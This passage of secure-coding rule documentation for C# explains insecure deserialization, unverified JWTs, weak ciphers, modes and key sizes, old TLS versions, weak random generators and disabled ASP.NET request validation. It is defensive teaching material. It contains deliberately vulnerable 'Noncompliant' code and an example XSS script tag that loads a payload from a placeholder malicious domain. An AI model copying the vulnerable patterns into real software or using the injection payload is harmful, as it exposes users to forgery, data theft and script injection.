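The MAC-based mitigation amounts to "verify before you deserialize". A language-neutral sketch using Python's standard library, with JSON standing in for the serialized payload format:

```python
import hashlib
import hmac
import json

SECRET = b"server-side secret key"  # illustrative; store real keys securely

def serialize_with_mac(obj):
    """Prefix the serialized payload with an HMAC-SHA256 tag."""
    payload = json.dumps(obj).encode()
    tag = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return tag + payload

def deserialize_with_mac(blob):
    """Verify the tag in constant time; deserialize only authentic payloads."""
    tag, payload = blob[:32], blob[32:]
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed: payload was tampered with")
    return json.loads(payload)  # only reached for authentic payloads

blob = serialize_with_mac({"user": "alice"})
print(deserialize_with_mac(blob))  # {'user': 'alice'}
# deserialize_with_mac(blob[:32] + b'{"user": "admin"}') would raise ValueError
```

This is the same principle the LosFormatter example below applies by enabling MAC verification in its constructor.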

Noncompliant code example

For BinaryFormatter, NetDataContractSerializer, SoapFormatter serializers:

var myBinaryFormatter = new BinaryFormatter();
myBinaryFormatter.Deserialize(stream); // Noncompliant: a binder is not used to limit types during deserialization

JavaScriptSerializer should not use SimpleTypeResolver or other weak resolvers:

JavaScriptSerializer serializer1 = new JavaScriptSerializer(new SimpleTypeResolver()); // Noncompliant: SimpleTypeResolver is insecure (every type is resolved)
serializer1.Deserialize<ExpectedType>(json);

LosFormatter should not be used without MAC verification:

LosFormatter formatter = new LosFormatter(); // Noncompliant
formatter.Deserialize(fs);

Compliant solution

BinaryFormatter, NetDataContractSerializer and SoapFormatter serializers should use a binder implementing a whitelist approach to limit types during deserialization (at least one exception should be thrown or a null value returned):

sealed class CustomBinder : SerializationBinder
{
   public override Type BindToType(string assemblyName, string typeName)
   {
       if (!(typeName == "type1" || typeName == "type2" || typeName == "type3"))
       {
          throw new SerializationException("Only type1, type2 and type3 are allowed"); // Compliant
       }
       return Assembly.Load(assemblyName).GetType(typeName);
   }
}

var myBinaryFormatter = new BinaryFormatter();
myBinaryFormatter.Binder = new CustomBinder();
myBinaryFormatter.Deserialize(stream);

JavaScriptSerializer should use a resolver implementing a whitelist to limit types during deserialization (at least one exception should be thrown or a null value returned):

public class CustomSafeTypeResolver : JavaScriptTypeResolver
{
   public override Type ResolveType(string id)
   {
      if(id != "ExpectedType") {
         throw new ArgumentException("Only ExpectedType is allowed during deserialization"); // Compliant
      }
      return Type.GetType(id);
   }
}

JavaScriptSerializer serializer = new JavaScriptSerializer(new CustomSafeTypeResolver()); // Compliant
serializer.Deserialize<ExpectedType>(json);

LosFormatter serializer with MAC verification:

LosFormatter formatter = new LosFormatter(true, secret); // Compliant
formatter.Deserialize(fs);

Resources

csharpsquid:S4564

This rule is deprecated; use S5753 instead.

Why is this an issue?

ASP.NET has a feature to validate HTTP requests in order to prevent potentially dangerous content from being used to perform a cross-site scripting (XSS) attack. There is no reason to disable this mechanism, even if other checks to prevent XSS attacks are in place.

This rule raises an issue if a method with parameters is marked with System.Web.Mvc.HttpPostAttribute and not System.Web.Mvc.ValidateInputAttribute(true).

Noncompliant code example

public class FooBarController : Controller
{
    [HttpPost] // Noncompliant
    [ValidateInput(false)]
    public ActionResult Purchase(string input)
    {
        return Foo(input);
    }

    [HttpPost] // Noncompliant
    public ActionResult PurchaseSomethingElse(string input)
    {
        return Foo(input);
    }
}

Compliant solution

public class FooBarController : Controller
{
    [HttpPost]
    [ValidateInput(true)] // Compliant
    public ActionResult Purchase(string input)
    {
        return Foo(input);
    }
}

Exceptions

Parameterless methods marked with System.Web.Mvc.HttpPostAttribute will not trigger this issue.

Resources

csharpsquid:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Jwt.Net

Code examples

The following code contains an example of JWT decoding without verification of the signature.

Noncompliant code example

using JWT;

public static void decode(IJwtDecoder decoder)
{
    decoder.Decode(token, secret, verify: false); // Noncompliant
}

using JWT;

public static void decode()
{
    var jwt = new JwtBuilder()
        .WithSecret(secret)
        .Decode(token); // Noncompliant
}

Compliant solution

using JWT;

public static void decode(IJwtDecoder decoder)
{
    decoder.Decode(token, secret, verify: true);
}

When using JwtBuilder, make sure to call MustVerifySignature().

using JWT;

public static void decode()
{
    var jwt = new JwtBuilder()
        .WithSecret(secret)
        .MustVerifySignature()
        .Decode(token);
}

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.
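For illustration outside of Jwt.Net, here is a minimal HS256 sign/verify sketch in Python using only the standard library. Real applications should use a maintained JWT library rather than this hand-rolled version:

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    """Base64url without padding, as used by JWTs."""
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def sign_jwt(claims, secret):
    """Build an HS256-signed token: header.payload.signature."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = header + b"." + payload
    sig = b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())
    return (signing_input + b"." + sig).decode()

def verify_jwt(token, secret):
    """Reject the token unless the signature matches: never skip this step."""
    header, payload, sig = token.encode().split(b".")
    expected = b64url(hmac.new(secret, header + b"." + payload, hashlib.sha256).digest())
    return hmac.compare_digest(sig, expected)

secret = b"demo-secret"
token = sign_jwt({"sub": "alice"}, secret)
print(verify_jwt(token, secret))           # True: authentic token
print(verify_jwt(token, b"wrong-secret"))  # False: forged or tampered token
```

Decoding the claims without calling the verification step is exactly the mistake the Noncompliant examples above make.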

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.
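The grace-period idea can be sketched as trying the current key first and falling back to recently retired keys. A hypothetical helper, shown here for an HMAC-style signature:

```python
import hashlib
import hmac

CURRENT_KEY = b"key-v2"
RETIRED_KEYS = [b"key-v1"]  # accepted only during the rotation grace period

def sign(message, key):
    return hmac.new(key, message, hashlib.sha256).digest()

def verify_with_rotation(message, tag):
    """Accept tags made with the current key or, temporarily, a retired one."""
    for key in [CURRENT_KEY] + RETIRED_KEYS:
        if hmac.compare_digest(sign(message, key), tag):
            return True
    return False

old_tag = sign(b"hello", b"key-v1")
print(verify_with_rotation(b"hello", old_tag))                    # True during grace period
print(verify_with_rotation(b"hello", sign(b"hello", b"key-v3")))  # False: unknown key
```

When the grace period ends, the retired key is simply dropped from the list and any tokens signed with it stop validating.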

Resources

Standards

csharpsquid:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker might be able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

using System.Security.Cryptography;

public void encrypt()
{
    var simpleDES = new DESCryptoServiceProvider(); // Noncompliant
}

Compliant solution

using System.Security.Cryptography;

public void encrypt()
{
    using (Aes aes = Aes.Create())
    {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

csharpsquid:S4211

Why is this an issue?

Transparency attributes, SecurityCriticalAttribute and SecuritySafeCriticalAttribute, are used to identify code that performs security-critical operations. The second indicates that it is safe to call this code from transparent code, while the first does not. Since the transparency attributes of code elements with larger scope take precedence over those of the code elements they contain, a class marked with SecurityCriticalAttribute, for instance, cannot contain a method marked with SecuritySafeCriticalAttribute.

This rule raises an issue when a member is marked with a System.Security security attribute that has a different transparency than the security attribute of a container of the member.

Noncompliant code example

using System;
using System.Security;

namespace MyLibrary
{

    [SecurityCritical]
    public class Foo
    {
        [SecuritySafeCritical] // Noncompliant
        public void Bar()
        {
        }
    }
}

Compliant solution

using System;
using System.Security;

namespace MyLibrary
{

    [SecurityCritical]
    public class Foo
    {
        public void Bar()
        {
        }
    }
}

Resources

csharpsquid:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker might be able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

using System.Security.Cryptography;

public void encrypt()
{
    AesManaged aes = new AesManaged
    {
        KeySize = 128,
        BlockSize = 128,
        Mode = CipherMode.ECB,        // Noncompliant
        Padding = PaddingMode.PKCS7
    };
}

Note that Microsoft has marked derived cryptographic types like AesManaged as no longer recommended for use.

Example with an asymmetric cipher, RSA:

using System.Security.Cryptography;

public void encrypt()
{
    RSACryptoServiceProvider RsaCsp = new RSACryptoServiceProvider();
    byte[] encryptedData            = RsaCsp.Encrypt(dataToEncrypt, false); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

using System.Security.Cryptography;

public void encrypt()
{
    AesGcm aes = new AesGcm(key);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

using System.Security.Cryptography;

public void encrypt()
{
    RSACryptoServiceProvider RsaCsp = new RSACryptoServiceProvider();
    byte[] encryptedData            = RsaCsp.Encrypt(dataToEncrypt, true);
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.
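To make the GCM recommendation concrete, here is a hedged sketch of a complete AES-GCM encryption helper built on .NET's AesGcm class (available since .NET Core 3.0). The helper name and tuple return type are illustrative choices, not part of the rule:

```csharp
using System;
using System.Security.Cryptography;

public static class GcmExample
{
    // Illustrative helper: encrypts 'plaintext' with AES-GCM and returns the
    // nonce, ciphertext, and authentication tag needed for decryption.
    public static (byte[] Nonce, byte[] Ciphertext, byte[] Tag) Encrypt(byte[] key, byte[] plaintext)
    {
        byte[] nonce = new byte[AesGcm.NonceByteSizes.MaxSize]; // 12 bytes
        RandomNumberGenerator.Fill(nonce);                      // a fresh nonce per message is mandatory

        byte[] ciphertext = new byte[plaintext.Length];
        byte[] tag = new byte[AesGcm.TagByteSizes.MaxSize];     // 16 bytes

        using var aes = new AesGcm(key);
        aes.Encrypt(nonce, plaintext, ciphertext, tag);
        return (nonce, ciphertext, tag);
    }
}
```

Unlike ECB, every message gets a fresh random nonce, and the returned tag lets the receiver authenticate the ciphertext before trusting its contents.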

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.
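As a concrete illustration of the OAEP recommendation using the newer RSA factory API (the method name is illustrative):

```csharp
using System.Security.Cryptography;

public static class OaepExample
{
    public static byte[] EncryptWithOaep(byte[] dataToEncrypt)
    {
        using RSA rsa = RSA.Create(2048);
        // Request OAEP padding (here with SHA-256) explicitly,
        // rather than the legacy PKCS#1 v1.5 padding.
        return rsa.Encrypt(dataToEncrypt, RSAEncryptionPadding.OaepSHA256);
    }
}
```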

Resources

Articles & blog posts

Standards

csharpsquid:S4212

Why is this an issue?

Because serialization constructors allocate and initialize objects, security checks that are present on regular constructors must also be present on a serialization constructor. Failure to do so would allow callers that could not otherwise create an instance to use the serialization constructor to do this.

This rule raises an issue when a type implements the System.Runtime.Serialization.ISerializable interface, is not a delegate or interface, is declared in an assembly that allows partially trusted callers and has a constructor that takes a System.Runtime.Serialization.SerializationInfo object and a System.Runtime.Serialization.StreamingContext object which is not secured by a security check, but one or more of the regular constructors in the type is secured.

Noncompliant code example

using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security;
using System.Security.Permissions;

[assembly: AllowPartiallyTrustedCallersAttribute()]
namespace MyLibrary
{
    [Serializable]
    public class Foo : ISerializable
    {
        private int n;

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        public Foo()
        {
           n = -1;
        }

        protected Foo(SerializationInfo info, StreamingContext context) // Noncompliant
        {
           n = (int)info.GetValue("n", typeof(int));
        }

        void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
        {
           info.AddValue("n", n);
        }
    }
}

Compliant solution

using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security;
using System.Security.Permissions;

[assembly: AllowPartiallyTrustedCallersAttribute()]
namespace MyLibrary
{
    [Serializable]
    public class Foo : ISerializable
    {
        private int n;

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        public Foo()
        {
           n = -1;
        }

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        protected Foo(SerializationInfo info, StreamingContext context)
        {
           n = (int)info.GetValue("n", typeof(int));
        }

        void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
        {
           info.AddValue("n", n);
        }
    }
}

Resources

csharpsquid:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given time frame, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

These samples explicitly select TLS 1.0, which is cryptographically weak.

using System.Net;

public void encrypt()
{
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls; // Noncompliant
}

using System.Net.Http;
using System.Security.Authentication;

public void encrypt()
{
    new HttpClientHandler
    {
        SslProtocols = SslProtocols.Tls // Noncompliant
    };
}

Compliant solution

using System.Net;

public void encrypt()
{
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12 | SecurityProtocolType.Tls13;
}

using System.Net.Http;
using System.Security.Authentication;

public void encrypt()
{
    new HttpClientHandler
    {
        SslProtocols = SslProtocols.Tls12
    };
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback is that an outdated framework's TLS v1.2 configuration may still enable older cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.
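Beyond pinning TLS v1.2/v1.3 explicitly, a hedged sketch of another common approach is to defer the protocol choice to the operating system, so that newer TLS versions are picked up automatically as the OS is patched (the class and method names are illustrative):

```csharp
using System.Net.Http;
using System.Security.Authentication;

public static class TlsDefaults
{
    public static HttpClient Create()
    {
        var handler = new HttpClientHandler
        {
            // SslProtocols.None delegates the choice to the OS, which on a
            // patched system negotiates TLS 1.2 or 1.3 and nothing older.
            SslProtocols = SslProtocols.None
        };
        return new HttpClient(handler);
    }
}
```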

Resources

Articles & blog posts

Standards

csharpsquid:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive and has led to vulnerabilities in the past.

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the System.Random class relies on a pseudorandom number generator, it should not be used for security-critical applications or for protecting sensitive data. In such contexts, the System.Security.Cryptography.RandomNumberGenerator class, which relies on a cryptographically strong random number generator (RNG), should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

var random = new Random(); // Sensitive use of Random
byte[] data = new byte[16];
random.NextBytes(data);
return BitConverter.ToString(data); // Check if this value is used for hashing or encryption

Compliant Solution

using System.Security.Cryptography;
...
var randomGenerator = RandomNumberGenerator.Create(); // Compliant for security-sensitive use cases
byte[] data = new byte[16];
randomGenerator.GetBytes(data);
return BitConverter.ToString(data);

See

csharpsquid:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)
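The key-derivation case mentioned above can be sketched as follows, assuming .NET 6+ for the static Rfc2898DeriveBytes.Pbkdf2 helper; the method name and iteration count are illustrative:

```csharp
using System.Security.Cryptography;
using System.Text;

public static class KdfExample
{
    // Illustrative only: derives a 256-bit AES key from a passphrase with PBKDF2.
    public static byte[] DeriveAesKey(string passphrase, byte[] salt)
    {
        return Rfc2898DeriveBytes.Pbkdf2(
            Encoding.UTF8.GetBytes(passphrase),
            salt,
            iterations: 600_000,        // on the order of current OWASP guidance for SHA-256
            HashAlgorithmName.SHA256,
            outputLength: 32);          // 32 bytes = 256-bit key
    }
}
```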

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given time frame, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var RsaCsp = new RSACryptoServiceProvider(); // Noncompliant
}

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var DsaCsp = new DSACryptoServiceProvider(); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

using System;
using System.Security.Cryptography;

public void encrypt()
{
    ECDsa ecdsa = ECDsa.Create(ECCurve.NamedCurves.brainpoolP160t1); // Noncompliant
}

Compliant solution

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var RsaCsp = new RSACryptoServiceProvider(2048);
}

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var Dsa = new DSACng(2048);
}

using System;
using System.Security.Cryptography;

public void encrypt()
{
    ECDsa ecdsa = ECDsa.Create(ECCurve.NamedCurves.nistP256);
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.
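A minimal sketch of selecting an AES key size in .NET (unlike the RSA providers, SymmetricAlgorithm.KeySize is settable and regenerates the key):

```csharp
using System.Security.Cryptography;

public static class AesKeySizeExample
{
    public static Aes CreateAes()
    {
        var aes = Aes.Create();
        aes.KeySize = 256; // generates a fresh 256-bit key; 128 bits is the accepted minimum
        return aes;
    }
}
```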

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of a key generated with an elliptic curve algorithm is indicated directly in the curve's name. For example, secp256k1 yields a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Pitfalls

The KeySize Property is not a setter

The following code is invalid:

var RsaCsp = new RSACryptoServiceProvider();
RsaCsp.KeySize = 2048;

Assigning to the KeySize property of a CryptoServiceProvider does not update the underlying key size, and neither the compiler nor the runtime will warn you about it. This should not be considered a workaround.
To change the key size, use one of the overloaded constructors with the desired key size instead.
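A minimal sketch of the correct approach, passing the size to the constructor (the method name is illustrative):

```csharp
using System.Security.Cryptography;

public static class RsaKeySizeExample
{
    public static RSACryptoServiceProvider CreateRsa()
    {
        // The key size must be chosen at construction time;
        // assigning to KeySize afterwards has no effect on this provider.
        return new RSACryptoServiceProvider(2048);
    }
}
```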

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

csharpsquid:S5753

ASP.NET 1.1+ comes with a feature called Request Validation, which prevents the server from accepting content containing un-encoded HTML. This feature acts as a first protection layer against Cross-Site Scripting (XSS) attacks, much like a simple Web Application Firewall (WAF) that rejects requests potentially containing malicious content.

While this feature is not a silver bullet against all XSS attacks, it helps to catch basic ones. For example, it will prevent <script type="text/javascript" src="https://malicious.domain/payload.js"> from reaching your Controller.

Note: as the Request Validation feature is only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.

Ask Yourself Whether

  • the developer doesn’t know the impact of deactivating the Request Validation feature
  • the web application accepts user-supplied data
  • not all user-supplied data is validated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Activate the Request Validation feature for all HTTP requests

Sensitive Code Example

At Controller level:

[ValidateInput(false)]
public ActionResult Welcome(string name)
{
  ...
}

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="false" />
      ...
      <httpRuntime requestValidationMode="0.0" />
   </system.web>
</configuration>

Compliant Solution

At Controller level:

[ValidateInput(true)]
public ActionResult Welcome(string name)
{
  ...
}

or

public ActionResult Welcome(string name)
{
  ...
}

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="true" />
      ...
      <httpRuntime requestValidationMode="4.5" />
